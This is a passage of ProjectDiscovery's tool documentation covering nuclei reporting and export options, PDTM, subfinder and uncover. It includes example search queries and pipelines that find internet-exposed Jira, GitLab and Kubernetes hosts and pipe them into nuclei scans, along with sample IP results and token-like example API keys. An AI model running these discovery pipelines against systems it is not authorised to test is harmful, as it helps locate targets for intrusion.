freeform: $CVSSMetrics
customfield_00003:
freeform: $CVSSScore
```
To write results to a MongoDB database collection, update the config file with the connection information.
```yaml
mongodb:
# the connection string to the MongoDB database
# (e.g., mongodb://root:example@localhost:27017/nuclei?ssl=false&authSource=admin)
connection-string: ""
# the name of the collection to store the issues
collection-name: ""
# excludes the Request and Response from the results (helps with filesize)
omit-raw: false
# determines the number of results to be kept in memory before writing it to the database or 0 to
# persist all in memory and write all results at the end (default)
batch-size: 0
```
**Running nuclei with reporting module:**
```bash
nuclei -l urls.txt -t cves/ -rc issue-tracker.yaml
```
Similarly, other platforms can be configured. Reporting module also supports basic filtering and duplicate checks to avoid duplicate ticket creation.
```yaml
allow-list:
severity: high,critical
```
This will ensure to only creating tickets for issues identified with **high** and **critical** severity; similarly, `deny-list` can be used to exclude issues with a specific severity.
If you are running periodic scans on the same assets, you might want to consider `-rdb, -report-db` flag that creates a local copy of the valid findings in the given directory utilized by reporting module to compare and **create tickets for unique issues only**.
```bash
nuclei -l urls.txt -t cves/ -rc issue-tracker.yaml -rdb prod
```
**Markdown Export**
Nuclei supports markdown export of valid findings with `-me, -markdown-export` flag, this flag takes directory as input to store markdown formatted reports.
Including request/response in the markdown report is optional, and included when `-irr, -include-rr` flag is used along with `-me`.
```bash
nuclei -l urls.txt -t cves/ -irr -markdown-export reports
```
**SARIF Export**
Nuclei supports SARIF export of valid findings with `-se, -sarif-export` flag. This flag takes a file as input to store SARIF formatted report.
```bash
nuclei -l urls.txt -t cves/ -sarif-export report.sarif
```
It is also possible to visualize Nuclei results using **SARIF** files.
1. By uploading a SARIF file to [SARIF Viewer](https://microsoft.github.io/sarif-web-component/)
2. By uploading a SARIF file to [Github Actions](https://docs.github.com/en/code-security/code-scanning/integrating-with-code-scanning/uploading-a-sarif-file-to-github)
More info on the SARIF output is documented [here](https://github.com/projectdiscovery/nuclei/pull/2925).
These are **not official** viewers of Nuclei and `Nuclei` has no liability
towards any of these options to visualize **Nuclei** results. These are just
some publicly available options to visualize SARIF files.
## Scan **Metrics**
Nuclei expose running scan metrics on a local port `9092` when `-metrics` flag is used and can be accessed at **localhost:9092/metrics**, default port to expose scan information is configurable using `-metrics-port` flag.
Here is an example to query `metrics` while running nuclei as following `nuclei -t cves/ -l urls.txt -metrics`
```bash
curl -s localhost:9092/metrics | jq .
```
```json
{
"duration": "0:00:03",
"errors": "2",
"hosts": "1",
"matched": "0",
"percent": "99",
"requests": "350",
"rps": "132",
"startedAt": "2021-03-27T18:02:18.886745+05:30",
"templates": "256",
"total": "352"
}
```
## Passive Scan
Nuclei engine supports passive mode scanning for HTTP based template utilizing file support, with this support we can run HTTP based templates against locally stored HTTP response data collected from any other tool.
```sh
nuclei -passive -target http_data
```
Passive mode support is limited for templates having `{{BasedURL}}` or `{{BasedURL/}}` as base path.
## Running With Docker
If Nuclei was installed within a Docker container based on the [installation instructions](./install),
the executable does not have the context of the host machine. This means that the executable will not be able to access
local files such as those used for input lists or templates. To resolve this, the container should be run with volumes
mapped to the local filesystem to allow access to these files.
### Basic Usage
This example runs a Nuclei container against `google.com`, prints the results to JSON and removes the container once it
has completed:
```sh
docker run --rm projectdiscovery/nuclei -u google.com -jsonl
```
### Using Volumes
This example runs a Nuclei container against a list of URLs, writes the results to a `.jsonl` file and removes the
container once it has completed.
```sh
# This assumes there's a file called `urls.txt` in the current directory
docker run --rm -v ./:/app/ projectdiscovery/nuclei -l /app/urls.txt -jsonl /app/results.jsonl
# The results will be written to `./results.jsonl` on the host machine once the container has completed
```
# PDTM Install
Source: https://docs.projectdiscovery.io/tools/pdtm/install
Learn how to install PDTM and get started
Enter the command below in a terminal to install ProjectDiscovery's Chaos Client using Go.
```sh
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
```
```bash
https://github.com/projectdiscovery/pdtm/releases
```
* Download the latest binary for your OS.
* Unzip the ready-to-run binary.
## Installation Notes
* PDTM requires the latest version of [**Go**](https://go.dev/doc/install)
* Projects are installed by downloading the released project binary. This means that projects can only be installed on the platforms for which binaries have been published.
* The path $HOME/.pdtm/go/bin is added to the $PATH variable by default
# PDTM Overview
Source: https://docs.projectdiscovery.io/tools/pdtm/overview
Use ProjectDiscovery Tool Manager to download and organize your tools
ProjectDiscovery Tool Manager or PDTM is an easy way to download and keep your ProjectDiscovery tools organized and easy to access, update, and more. For users interestd in taking advantage of multiple ProjectDiscovery tools we recommend downloading PDTM rather than downloading the binary for each tool separately.
Check out [the great blog](https://blog.projectdiscovery.io/getting-started-with-projectdiscovery-in-linux-and-windows/) for getting started with ProjectDiscovery tools using Linux and Windows.
You can access the PDTM [GitHub repo here](https://github.com/projectdiscovery/pdtm).
## Support
Questions about using Chaos? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running PDTM
Source: https://docs.projectdiscovery.io/tools/pdtm/running
Learn about PDTM with examples including commands and output
For all of the flags and options available for `PDTM` be sure to check out the [Usage](/tools/pdtm/usage) page. On this page we'll share an example of running PDTM.
If you have questions, reach out to us through [Help](/help).
## Basic Example
```console
$ pdtm -install-all
____
____ ____/ / /_____ ___
/ __ \/ __ / __/ __ __ \
/ /_/ / /_/ / /_/ / / / / /
/ .___/\__,_/\__/_/ /_/ /_/
/_/ v0.0.1
projectdiscovery.io
[INF] Installed httpx v1.1.1
[INF] Installed nuclei v2.6.3
[INF] Installed naabu v2.6.3
[INF] Installed dnsx v2.6.3
```
# PDTM Usage
Source: https://docs.projectdiscovery.io/tools/pdtm/usage
Learn PDTM usage including flags and options
## Access help
Use `pdtm - h` to display all help options.
## PDTM options
```console
Usage:
./pdtm [flags]
Flags:
CONFIG:
-config string cli flag configuration file (default "$HOME/.config/pdtm/config.yaml")
-bp, -binary-path string custom location to download project binary (default "$HOME/.pdtm/go/bin")
INSTALL:
-i, -install string[] install single or multiple project by name (comma separated)
-ia, -install-all install all the projects
-ip, -install-path append path to PATH environment variables
UPDATE:
-u, -update string[] update single or multiple project by name (comma separated)
-ua, -update-all update all the projects
-up, -self-update update pdtm to latest version
-duc, -disable-update-check disable automatic pdtm update check
REMOVE:
-r, -remove string[] remove single or multiple project by name (comma separated)
-ra, -remove-all remove all the projects
-rp, -remove-path remove path from PATH environment variables
DEBUG:
-sp, -show-path show the current binary path then exit
-version show version of the project
-v, -verbose show verbose output
-nc, -no-color disable output content coloring (ANSI escape codes)
-disable-changelog, -dc disable release changelog in output
```
# Installing Subfinder
Source: https://docs.projectdiscovery.io/tools/subfinder/install
Learn about how to install and get started with Subfinder
```bash
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
```
Subfinder requires the latest **GO** version to install successfully.
```bash
brew install subfinder
```
Supported in **macOS** (or Linux)
```bash
docker pull projectdiscovery/subfinder:latest
```
{/* Docker-specific usage instructions can be found [here](./running#running-with-docker). */}
```bash
git clone https://github.com/projectdiscovery/subfinder.git; \
cd subfinder/v2/cmd/subfinder; \
go build; \
mv subfinder /usr/local/bin/; \
subfinder -version;
```
Subfinder require the latest **GO** version to install successfully.
```bash
https://github.com/projectdiscovery/subfinder/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation notes
* Subfinder requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/subfinder`
## Post install configuration
Subfinder is available immediately after installation, however the following services require the configuration of API keys to work:
[BeVigil](https://bevigil.com/osint-api), [BinaryEdge](https://binaryedge.io), [BufferOver](https://tls.bufferover.run), [C99](https://api.c99.nl/), [Censys](https://censys.io), [CertSpotter](https://sslmate.com/certspotter/api/), [Chaos](https://chaos.projectdiscovery.io),
[Chinaz](http://my.chinaz.com/ChinazAPI/DataCenter/MyDataApi), [DNSDB](https://api.dnsdb.info), [Fofa](https://fofa.info/static_pages/api_help), [FullHunt](https://fullhunt.io), [GitHub](https://github.com), [Intelx](https://intelx.io),
[PassiveTotal](http://passivetotal.org), [quake](https://quake.360.cn), [Robtex](https://www.robtex.com/api/), [SecurityTrails](http://securitytrails.com), [Shodan](https://shodan.io), [ThreatBook](https://x.threatbook.cn/en),
[VirusTotal](https://www.virustotal.com), [WhoisXML API](https://whoisxmlapi.com/), ZoomEye API [china](https://api.zoomeye.org) - [worldwide](https://api.zoomeye.hk),
[dnsrepo](https://dnsrepo.noc.org), [Hunter](https://hunter.qianxin.com/), [Facebook](https://developers.facebook.com), [BuiltWith](https://api.builtwith.com/domain-api)
You can also use the `subfinder -ls` command to display all the available sources.
These values are stored in the `$HOME/.config/subfinder/provider-config.yaml` file which will be created when you run the tool for the first time.
The configuration file uses the YAML format. Multiple API keys can be specified for each of these services from which one of them will be used for enumeration.
Composite keys for sources like, Censys, PassiveTotal, Fofa, Intellix and 360quake, need to be separated with a colon (:).
## Example provider config
An example provider config file:
```
binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
redhuntlabs:
- ENDPOINT:API_TOKEN
- https://reconapi.redhuntlabs.com/community/v1/domains/subdomains:joEPzJJp2AuOCw7teAj63HYrPGnsxuPQ
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeyeapi:
- zoomeye.hk:4f73021d-ff95-4f53-937f-83d6db719eec
quake:
- 0cb9030c-0a40-48a3-b8c4-fca28e466ba3
facebook:
- APP_ID:APP_SECRET
intelx:
- HOST:API_KEY
- 2.intelx.io:s4324-b98b-41b2-220e8-3320f6a1284d
```
## RedHunt Lab Attack Surface Recon API
RedHunt Labs's [Attack Surface Recon API](https://devportal.redhuntlabs.com/) has different API endpoints depending on the user's subscription. Make sure to add the appropriate endpoint before running any scans.
## ZoomEye API
Before conducting any scans, please ensure you are using the correct host to comply with geographical access restrictions of the ZoomEye API:
* **zoomeye.org** is exclusively for users within China.
* **zoomeye.hk** is for users outside China.
# Subfinder Overview
Source: https://docs.projectdiscovery.io/tools/subfinder/overview
A robust discovery tool for passive enumeration on valid subdomains
## What is **Subfinder?**
Subfinder is a subdomain discovery tool that finds and returns valid subdomains for websites.
Using passive online sources, it has a simple modular architecture optimized for speed. Subfinder is built for one thing - passive subdomain enumeration, and it does that very well.
Subfinder complies with all the passive source licenses and usage restrictions for its sources. The passive model guarantees speed and stealthiness that can be leveraged by both penetration testers and bug bounty hunters alike.
[Check out this post on all of Subfinder's features](https://blog.projectdiscovery.io/do-you-really-know-subfinder-an-in-depth-guide-to-all-features-of-subfinder-beginner-to-advanced/) from the ProjectDiscovery Blog for more.
## Features and capabilities
* Fast and powerful resolution and wildcard elimination modules
* Curated passive sources to maximize results
* Multiple supported output formats (JSON, file, stdout)
* Optimized for speed and lightweight on resources
* STDIN/OUT support enables easy integration into workflows
## Additional Subfinder resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://securitytrails.com/blog/subfinder](https://securitytrails.com/blog/subfinder)
* [https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/](https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/)
* [https://dhiyaneshgeek.github.io/research,bug/bounty/2024/01/03/subfinder-securitytrails/](https://dhiyaneshgeek.github.io/research,bug/bounty/2024/01/03/subfinder-securitytrails/)
## Support
Questions about using Subfinder? Issues working through installation? Cool story or use case you want to share? Get in touch! Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running
Source: https://docs.projectdiscovery.io/tools/subfinder/running
Learn about running Subfinder with examples including commands and output
For all of the flags and options available for `Subfinder` be sure to check out the [Usage](/tools/subfinder/usage) page. On this page we'll share examples running Subfinder with specific flags and goals
and the output you can expect from each. *If you have questions, reach out to us through [Help](/help).*
## Basic Usage
To run Subfinder on a specific target use the `-d` flag to specify the domain.
```
subfinder -d hackerone.com
__ _____ __
_______ __/ /_ / __(_)___ ____/ /__ _____
/ ___/ / / / __ \/ /_/ / __ \/ __ / _ \/ ___/
(__ ) /_/ / /_/ / __/ / / / / /_/ / __/ /
/____/\__,_/_.___/_/ /_/_/ /_/\__,_/\___/_/ v2.4.9
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
By using subfinder, you also agree to the terms of the APIs used.
[INF] Enumerating subdomains for hackerone.com
www.hackerone.com
support.hackerone.com
links.hackerone.com
api.hackerone.com
o1.email.hackerone.com
go.hackerone.com
3d.hackerone.com
resources.hackerone.com
a.ns.hackerone.com
b.ns.hackerone.com
mta-sts.hackerone.com
docs.hackerone.com
mta-sts.forwarding.hackerone.com
gslink.hackerone.com
hackerone.com
info.hackerone.com
mta-sts.managed.hackerone.com
events.hackerone.com
[INF] Found 18 subdomains for hackerone.com in 3 seconds 672 milliseconds
```
## Pipe Results to Other Tools
The subdomains discovered can be piped to other tools. For example, you can pipe the discovered subdomains to httpx which will then find running HTTP servers on the host.
```
echo hackerone.com | subfinder -silent | httpx -silent
http://hackerone.com
http://www.hackerone.com
http://docs.hackerone.com
http://api.hackerone.com
https://docs.hackerone.com
http://mta-sts.managed.hackerone.com
```
## Subfinder and Docker
Pull the latest tagged `subfinder` Docker image using:
```
docker pull projectdiscovery/subfinder:latest
```
Run `subfinder` using the Docker image:
```
docker run projectdiscovery/subfinder:latest -d hackerone.com
```
Run `subfinder` using the Docker image with a local config file:
```
docker run -v $CONFIG/subfinder:/root/.config/subfinder -t projectdiscovery/subfinder -d hackerone.com
```
## Subfinder Go library
`subfinder` can also be used as library and a minimal examples of using subfinder SDK is available [in the example library.](https://github.com/projectdiscovery/subfinder/blob/dev/v2/examples/main.go)
# Subfinder Usage
Source: https://docs.projectdiscovery.io/tools/subfinder/usage
Learn Subfinder usage including input, flags, and filters
## Access help
Use `subfinder -h` to display all help options.
## Subfinder help options
```
Flags:
INPUT:
-d, -domain string[] domains to find subdomains for
-dL, -list string file containing list of domains for subdomain discovery
SOURCE:
-s, -sources string[] specific sources to use for discovery (-s crtsh,github). Use -ls to display all available sources.
-recursive use only sources that can handle subdomains recursively (e.g. subdomain.domain.tld vs domain.tld)
-all use all sources for enumeration (slow)
-es, -exclude-sources string[] sources to exclude from enumeration (-es alienvault,zoomeyeapi)
FILTER:
-m, -match string[] subdomain or list of subdomain to match (file or comma separated)
-f, -filter string[] subdomain or list of subdomain to filter (file or comma separated)
RATE-LIMIT:
-rl, -rate-limit int maximum number of http requests to send per second
-rls value maximum number of http requests to send per second four providers in key=value format (-rls "hackertarget=10/s,shodan=15/s")
-t int number of concurrent goroutines for resolving (-active only) (default 10)
UPDATE:
-up, -update update subfinder to latest version
-duc, -disable-update-check disable automatic subfinder update check
OUTPUT:
-o, -output string file to write output to
-oJ, -json write output in JSONL(ines) format
-oD, -output-dir string directory to write output (-dL only)
-cs, -collect-sources include all sources in the output (-json only)
-oI, -ip include host IP in output (-active only)
CONFIGURATION:
-config string flag config file (default "$CONFIG/subfinder/config.yaml")
-pc, -provider-config string provider config file (default "$CONFIG/subfinder/provider-config.yaml")
-r string[] comma separated list of resolvers to use
-rL, -rlist string file containing list of resolvers to use
-nW, -active display active subdomains only
-proxy string http proxy to use with subfinder
-ei, -exclude-ip exclude IPs from the list of domains
DEBUG:
-silent show only subdomains in output
-version show version of subfinder
-v show verbose output
-nc, -no-color disable color in output
-ls, -list-sources list all available sources
OPTIMIZATION:
-timeout int seconds to wait before timing out (default 30)
-max-time int minutes to wait for enumeration results (default 10)
```
# uncover Install
Source: https://docs.projectdiscovery.io/tools/uncover/install
Learn how to install uncover and get started
Enter the command below in a terminal to install uncover using Go.
```bash
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
```
## Installation Notes
* uncover requires the latest version of [**Go**](https://go.dev/doc/install)
# uncover Overview
Source: https://docs.projectdiscovery.io/tools/uncover/overview
A Go wrapper using APIs to discover exposed hosts
`uncover` is a Go wrapper using APIs from well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and use the results with your current pipeline tools.
The uncover [GitHub repo is available here](https://github.com/projectdiscovery/uncover)
## Features
* Query multiple search engine at once
* Available Search engine support
* [Shodan](https://www.shodan.io)
* [Censys](https://search.censys.io)
* [FOFA](https://fofa.info)
* [Hunter](https://hunter.qianxin.com)
* [Quake](https://quake.360.net/quake/#/index)
* [Zoomeye](https://www.zoomeye.org)
* [Netlas](https://netlas.io/)
* [CriminalIP](https://www.criminalip.io)
* [PublicWWW](https://publicwww.com)
* [HunterHow](https://hunter.how)
* Multiple API key input support
* Automatic API key randomization
* **stdin** / **stdout** support for input
## Support
Questions about using `uncover`? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running uncover
Source: https://docs.projectdiscovery.io/tools/uncover/running
Learn about running uncover including examples
## Basic Usage
For all of the flags and options available for **uncover** be sure to check out the [Usage](/tools/uncover/usage) page.
If you have questions, reach out to us through [Help](/help).
### Default run:
**uncover** supports multiple ways to make the query including **stdin** or `q` flag, as default `shodan` engine is used for search if no engine is specified.
```console
echo 'ssl:"Uber Technologies, Inc."' | uncover
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
107.180.12.116:993
107.180.26.155:443
104.244.99.31:443
161.28.20.79:443
104.21.8.108:443
198.71.233.203:443
104.17.237.13:443
162.255.165.171:443
12.237.119.61:443
192.169.250.211:443
104.16.251.50:443
```
Running **uncover** with **file** input containing multiple search queries per line.
```console
cat dorks.txt
ssl:"Uber Technologies, Inc."
title:"Grafana"
```
```console
uncover -q dorks.txt
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
107.180.12.116:993
107.180.26.155:443
104.244.99.31:443
161.28.20.79:443
104.21.8.108:443
198.71.233.203:443
2607:7c80:54:3::74:3001
104.198.55.35:80
46.101.82.244:3000
34.147.126.112:80
138.197.147.213:8086
```
### Single query against multiple search engines
**uncover** supports multiple search engine, as default **shodan** is used, `-e` flag can be used to run same query against any or all search engines.
```console
echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye,netlas,criminalip
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
176.31.249.189:5001
13.211.116.80:443
43.130.1.221:631
192.195.70.29:443
52.27.22.181:443
117.48.120.226:8889
106.52.115.145:49153
13.69.135.128:443
193.35.99.158:443
18.202.109.218:8089
101.36.105.97:21379
42.194.226.30:2626
```
### Multiple queries against multiple search engines
```console
uncover -shodan 'http.component:"Atlassian Jira"' -censys 'services.software.product=`Jira`' -fofa 'app="ATLASSIAN-JIRA"' -quake 'Jira' -hunter 'Jira' -zoomeye 'app:"Atlassian JIRA"' -netlas 'jira' -criminalip 'Jira'
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
104.68.37.129:443
162.222.160.42:443
34.255.84.133:443
52.204.121.166:443
23.198.29.120:443
136.156.180.95:443
54.194.233.15:443
104.117.55.155:443
149.81.4.6:443
54.255.218.95:443
3.223.137.57:443
83.228.124.171:443
23.202.195.82:443
52.16.59.25:443
18.159.145.227:443
104.105.53.236:443
```
### Shodan-InternetDB API
**uncover** supports [shodan-internetdb](https://internetdb.shodan.io) API to pull available ports for given IP/CIDR input.
`shodan-idb` used as **default** engine when **IP/CIDR** is provided as input, otherwise `shodan` search engine is used.
```console
echo 51.83.59.99/24 | uncover
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
51.83.59.1:53
51.83.59.1:10000
51.83.59.2:53
51.83.59.3:25
51.83.59.3:80
51.83.59.3:389
51.83.59.3:443
51.83.59.3:465
51.83.59.3:587
51.83.59.3:993
```
### [Awesome Search Queries Integration](https://github.com/projectdiscovery/awesome-search-queries)
The `-asq, -awesome-search-queries` flag allows you to use predefined awesome search queries to discover exposed assets on the internet. This feature leverages a curated list of queries that are known to yield interesting results. To use this feature, simply specify the `-asq` flag followed by the desired query. For example, to search for exposed Jira instances, you can use:
```console
uncover -asq jira -silent
....
```
### Field Format
`-f, -field` flag can be used to indicate which fields to return, currently, `ip`, `port`, and `host` are supported and can be used to return desired fields.
```console
uncover -q jira -f host -silent
ec2-44-198-22-253.compute-1.amazonaws.com
ec2-18-246-31-139.us-west-2.compute.amazonaws.com
tasks.devrtb.com
leased-line-91-149-128-229.telecom.by
74.242.203.213.static.inetbone.net
ec2-52-211-7-108.eu-west-1.compute.amazonaws.com
ec2-54-187-161-180.us-west-2.compute.amazonaws.com
185-2-52-226.static.nucleus.be
ec2-34-241-80-255.eu-west-1.compute.amazonaws.com
```
### Field Formatting
**uncover** has a `-f, -field` flag that can be used to customize the output format. For example, in the case of `uncover -f https://ip:port/version`, ip:port will be replaced with results in the output while keeping the format defined, It can also be used to specify a known scheme/path/file in order to prepare the output so that it can be immediately passed as input to other tools in the pipeline.
```console
echo kubernetes | uncover -f https://ip:port/version -silent
https://35.222.229.38:443/version
https://52.11.181.228:443/version
https://35.239.255.1:443/version
https://34.71.48.11:443/version
https://130.211.54.173:443/version
https://54.184.250.232:443/version
```
Output of **uncover** can be further piped to other projects in workflow accepting **stdin** as input, for example:
* `uncover -q example -f ip | naabu` - Runs [naabu](https://github.com/projectdiscovery/naabu) for port scanning on the found host.
* `uncover -q title:GitLab | httpx` - Runs [httpx](https://github.com/projectdiscovery/httpx) for web server probing the found result.
* `uncover -q 51.83.59.99/24 | httpx` - Runs [httpx](https://github.com/projectdiscovery/naabu) on host/ports obtained from shodan-internetdb.
```console
uncover -q http.title:GitLab -silent | httpx -silent
https://15.185.150.109
https://139.162.137.16
https://164.68.115.243
https://135.125.215.186
https://163.172.59.119
http://15.236.10.197
https://129.206.117.248
```
* `uncover -q 'org:"Example Inc."' | httpx | nuclei` - Runs [httpx](https://github.com/projectdiscovery/httpx) / [nuclei](https://github.com/projectdiscovery/nuclei) for vulnerability assessment.
![image](https://user-images.githubusercontent.com/8293321/156753063-86ea4c5d-92ad-4c24-a7af-871c12aa278c.png)
# uncover Usage
Source: https://docs.projectdiscovery.io/tools/uncover/usage
Learn uncover usage including flags and filters
## Access help
Use `uncover -h` to display all of the help options.
## uncover options
```console
Usage:
./uncover [flags]
Flags:
INPUT:
-q, -query string[] search query, supports: stdin,file,config input (example: -q 'example query', -q 'query.txt')
-e, -engine string[] search engine to query (shodan,shodan-idb,fofa,censys,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow) (default shodan)
-asq, -awesome-search-queries string[] use awesome search queries to discover exposed assets on the internet (example: -asq 'jira')
SEARCH-ENGINE:
-s, -shodan string[] search query for shodan (example: -shodan 'query.txt')
-sd, -shodan-idb string[] search query for shodan-idb (example: -shodan-idb 'query.txt')
-ff, -fofa string[] search query for fofa (example: -fofa 'query.txt')
-cs, -censys string[] search query for censys (example: -censys 'query.txt')
-qk, -quake string[] search query for quake (example: -quake 'query.txt')
-ht, -hunter string[] search query for hunter (example: -hunter 'query.txt')
-ze, -zoomeye string[] search query for zoomeye (example: -zoomeye 'query.txt')
-ne, -netlas string[] search query for netlas (example: -netlas 'query.txt')
-cl, -criminalip string[] search query for criminalip (example: -criminalip 'query.txt')
-pw, -publicwww string[] search query for publicwww (example: -publicwww 'query.txt')
-hh, -hunterhow string[] search query for hunterhow (example: -hunterhow 'query.txt')
CONFIG:
-pc, -provider string provider configuration file (default "$CONFIG/uncover/provider-config.yaml")
-config string flag configuration file (default "$CONFIG/uncover/config.yaml")
-timeout int timeout in seconds (default 30)
-rl, -rate-limit int maximum number of http requests to send per second
-rlm, -rate-limit-minute int maximum number of requests to send per minute
-retry int number of times to retry a failed request (default 2)
OUTPUT:
-o, -output string output file to write found results
-f, -field string field to display in output (ip,port,host) (default "ip:port")
-j, -json write output in JSONL(ines) format
-r, -raw write raw output as received by the remote api
-l, -limit int limit the number of results to return (default 100)
-nc, -no-color disable colors in output
DEBUG:
-silent show only results in output
-version show version of the project
-v show verbose output
```
## Notes:
* **keys/ credentials** are required to configure before running or using this project.
* `query` flag supports **all and only filters supported by search engine.**
* results are limited to `100` as default and can be increased with `limit` flag.
* `shodan-idb` API doesn't requires an API key and works out of the box.
* `shodan-idb` API is used as **default** engine when **IP/CIDR** is provided as input.